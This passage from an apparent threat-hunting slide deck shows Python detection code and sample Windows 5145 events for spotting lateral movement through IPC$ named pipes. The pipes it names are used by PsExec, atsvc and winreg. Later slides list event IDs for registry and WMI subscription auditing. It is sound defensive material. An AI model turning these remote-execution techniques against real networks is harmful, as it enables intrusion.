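        if category is None:
            continue
        rec = per_source[e["IpAddress"]]
        rec["categories"][category] += 1
        rec["pipes"].add(e["RelativeTargetName"])
        rec["users"].add(e["SubjectUserName"])
    return dict(per_source)


SAMPLE_EVENTS = [  # constructed sample events
    {"id": 5145, "IpAddress": "10.0.0.5", "SubjectUserName": "dadmin",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "PSEXESVC"},
    {"id": 5145, "IpAddress": "10.0.0.5", "SubjectUserName": "dadmin",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "PSEXESVC-PC0001-1234-stdin"},
    {"id": 5145, "IpAddress": "10.0.0.5", "SubjectUserName": "dadmin",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "atsvc"},
    {"id": 5145, "IpAddress": "10.0.0.5", "SubjectUserName": "dadmin",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "winreg"},
    # srvsvc (share enumeration) is a real pipe but not matched by the rules above.
    {"id": 5145, "IpAddress": "10.0.0.5", "SubjectUserName": "dadmin",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "srvsvc"},
    # A single winreg access from another host: reported, but a much weaker signal.
    {"id": 5145, "IpAddress": "10.0.0.7", "SubjectUserName": "jdoe",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "winreg"},
    # Not IPC$: a file on C$ is handled by the SMB copy hunt, not here.
    {"id": 5145, "IpAddress": "10.0.0.7", "SubjectUserName": "jdoe",
     "ShareName": r"\\*\C$", "RelativeTargetName": r"users\public\notes.txt"},
]

if __name__ == "__main__":
    for ip, rec in hunt_ipc_pipes(SAMPLE_EVENTS).items():
        print(ip, dict(rec["categories"]), sorted(rec["users"]))
```

Aggregating per source IP is what makes the PsExec case stand out: one host that touches the control pipe and then the per-session -stdin/-stdout/-stderr pipes within seconds is the E7 interaction on the earlier slide, whereas a lone winreg access is common from management tooling and needs the 4657 leg (with registry SACLs configured) before it is worth escalating.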

Page 47: Hunting Lateral Movement in Windows Infrastructure

Windows Registry Auditing

https://www.malwarearchaeology.com/s/Windows-Registry-Auditing-Cheat-Sheet-ver-Oct-2016.pdf

Page 48: Hunting Lateral Movement in Windows Infrastructure

Hunting: search for changes in autostart registry keys

Page 49: Hunting Lateral Movement in Windows Infrastructure

Remote WMI subscriptions creation

Page 50: Hunting Lateral Movement in Windows Infrastructure

Remote WMI subscriptions creation – events sequence on destination side

E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. Writing to WMI Namespace (Windows EID 4662) – if audit and SACL were configured

Page 51: Hunting Lateral Movement in Windows Infrastructure

WMI Namespaces Auditing

Page 52: Hunting Lateral Movement in Windows Infrastructure

Remote WMI subscriptions creation – the most interesting events